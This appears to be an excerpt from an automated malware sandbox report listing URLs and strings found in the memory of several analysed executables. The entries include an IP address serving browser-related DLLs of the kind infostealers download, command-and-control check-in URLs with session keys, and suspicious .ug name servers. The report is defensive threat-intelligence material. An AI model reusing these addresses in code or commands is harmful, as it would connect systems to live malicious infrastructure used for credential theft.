          Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
          Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
          Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllv
          Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllp
          Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462433139.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
          Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
          Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll
          Source: D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
          Source: D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll6
          Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
          Source: D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldll
          Source: D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllv
          Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
          Source: D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldll
          Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldllv
          Source: D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dllu
          Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
          Source: D8D3.exe, 00000013.00000003.485237869.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518405637.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465181701.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518803014.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517399688.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518546624.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462433139.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517988516.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446507226.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllt
          Source: D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllv
          Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.134/ll
          Source: 98D7.exe, 00000010.00000003.482623800.000000000056A000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://iueg.aapp
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.502829346.000000000288E000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000568000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000289F000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/check/safe
          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/check/safeB
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/check/safeT7-16b8-4
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/check/safeXdkojlmpp
          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/check/safei
          Source: 98D7.exe, 00000010.00000003.492565099.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com/m
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iueg.aappatey.com:80/check/safe
          Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://perficut.at/
          Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://perw.facebook.cueg.aappatey.com/check/safe
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/K
          Source: 98D7.exe, 00000010.00000003.502829346.000000000288E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675c
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMu
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef92RUnKXp
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E4
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com/r
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef
          Source: explorer.exe, 00000004.00000000.303832836.000000000F270000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
